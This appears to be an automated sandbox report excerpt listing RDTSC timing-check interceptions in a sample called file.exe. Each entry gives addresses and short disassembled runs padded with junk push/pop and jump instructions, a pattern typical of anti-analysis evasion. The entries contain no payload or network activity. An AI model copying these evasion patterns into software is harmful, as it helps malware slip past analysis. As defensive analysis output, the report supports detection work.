Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A8145 second address: 2A8151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A8433 second address: 2A8438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A872F second address: 2A8733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A8733 second address: 2A8773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD7ED12076Bh 0x0000000e jnp 00007FD7ED12076Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jng 00007FD7ED120768h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 jmp 00007FD7ED12076Ch 0x00000027 pop edi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A8773 second address: 2A877D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD7ECCCADE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2A877D second address: 2A8787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2AB99D second address: 2AB9A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2AFF91 second address: 2AFFA1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7ED120772h 0x00000008 jne 00007FD7ED120766h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B025D second address: 2B0277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0277 second address: 2B027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B027D second address: 2B0281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0281 second address: 2B02A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FD7ED120766h 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FD7ED120766h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B02A0 second address: 2B02A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B02A4 second address: 2B02AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B02AC second address: 2B02B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0444 second address: 2B044E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD7ED120766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B044E second address: 2B0452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0452 second address: 2B0460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FD7ED12076Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B073C second address: 2B0742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0742 second address: 2B0746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0746 second address: 2B074A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B074A second address: 2B0770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD7ED120777h 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0A56 second address: 2B0A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ECCCADF6h 0x00000008 jp 00007FD7ECCCADE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0CD6 second address: 2B0CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0CDA second address: 2B0D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD7ECCCADF4h 0x0000000e jg 00007FD7ECCCAE01h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0D0B second address: 2B0D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED120775h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jmp 00007FD7ED12076Eh 0x00000012 pop esi 0x00000013 jmp 00007FD7ED12076Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B0D46 second address: 2B0D59 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD7ECCCADEEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7B0A second address: 2B7B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120774h 0x00000007 jo 00007FD7ED120772h 0x0000000d jne 00007FD7ED120766h 0x00000013 jc 00007FD7ED120766h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7B3C second address: 2B7B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7ECCCADF0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7CF9 second address: 2B7D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD7ED120772h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jl 00007FD7ED120766h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7D1B second address: 2B7D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2B7D21 second address: 2B7D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BA4BB second address: 2BA4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD7ECCCADE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BA01D second address: 2BA027 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BA027 second address: 2BA02F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BA19F second address: 2BA1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BA1A5 second address: 2BA1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BF00C second address: 2BF012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2322B0 second address: 2322B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2322B6 second address: 2322D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007FD7ED120772h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BE5B7 second address: 2BE5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BE5BB second address: 2BE5DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD7ED12076Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2322C5 second address: 2322CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2322CB second address: 2322D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BE749 second address: 2BE756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FD7ECCCADE8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BE9F7 second address: 2BE9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BEB4E second address: 2BEB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2BEB54 second address: 2BEB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD7ED120779h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C19A0 second address: 2C19A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C5FF8 second address: 2C6001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C6001 second address: 2C6005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C6286 second address: 2C62A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007FD7ED120766h 0x00000009 jmp 00007FD7ED12076Fh 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FD7ED120766h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C62A9 second address: 2C62AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C6431 second address: 2C6435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C6435 second address: 2C648F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADF2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD7ECCCADF3h 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FD7ECCCAE0Dh 0x00000018 jmp 00007FD7ECCCADF8h 0x0000001d jmp 00007FD7ECCCADEFh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C648F second address: 2C6499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FD7ED120766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 26A03E second address: 26A047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 26A047 second address: 26A04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C68D0 second address: 2C68DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD7ECCCADE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C68DA second address: 2C68E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C68E2 second address: 2C68EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C68EA second address: 2C68EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C68EE second address: 2C68F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C6A5D second address: 2C6A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C6A63 second address: 2C6A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C6A6E second address: 2C6A74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C6A74 second address: 2C6A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD7ECCCADEEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D035C second address: 2D0381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007FD7ED120780h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D0381 second address: 2D0386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D0386 second address: 2D0399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 je 00007FD7ED120766h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D0399 second address: 2D039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D039D second address: 2D03B9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7ED120766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D03B9 second address: 2D03D8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7ECCCADF3h 0x00000008 jmp 00007FD7ECCCADEDh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007FD7ECCCADE6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CE44E second address: 2CE48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FD7ED12076Fh 0x0000000e jmp 00007FD7ED12076Bh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD7ED120777h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF82E second address: 2CF834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF834 second address: 2CF838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CF838 second address: 2CF83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D49EE second address: 2D49F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D49F2 second address: 2D49F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D87F2 second address: 2D87FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2215F6 second address: 221600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 221600 second address: 22160B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD7ED120766h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 22160B second address: 22161B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 22161B second address: 22161F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D81DF second address: 2D81E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D81E5 second address: 2D81FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED120771h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D81FB second address: 2D8216 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007FD7ECCCADE6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jo 00007FD7ECCCADE8h 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D8216 second address: 2D821C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D84C9 second address: 2D84F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD7ECCCADEDh 0x0000000d pop esi 0x0000000e push ecx 0x0000000f jne 00007FD7ECCCADECh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2D84F0 second address: 2D84F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DE33D second address: 2DE343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DE343 second address: 2DE35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ED120772h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DE35E second address: 2DE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DE362 second address: 2DE366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DEA21 second address: 2DEA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DEC9C second address: 2DECDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FD7ED120773h 0x00000014 jmp 00007FD7ED12076Ch 0x00000019 popad 0x0000001a jnl 00007FD7ED120772h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DF117 second address: 2DF134 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7ECCCADE6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007FD7ECCCADECh 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DF134 second address: 2DF13A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DF13A second address: 2DF13E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DFF6A second address: 2DFF7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
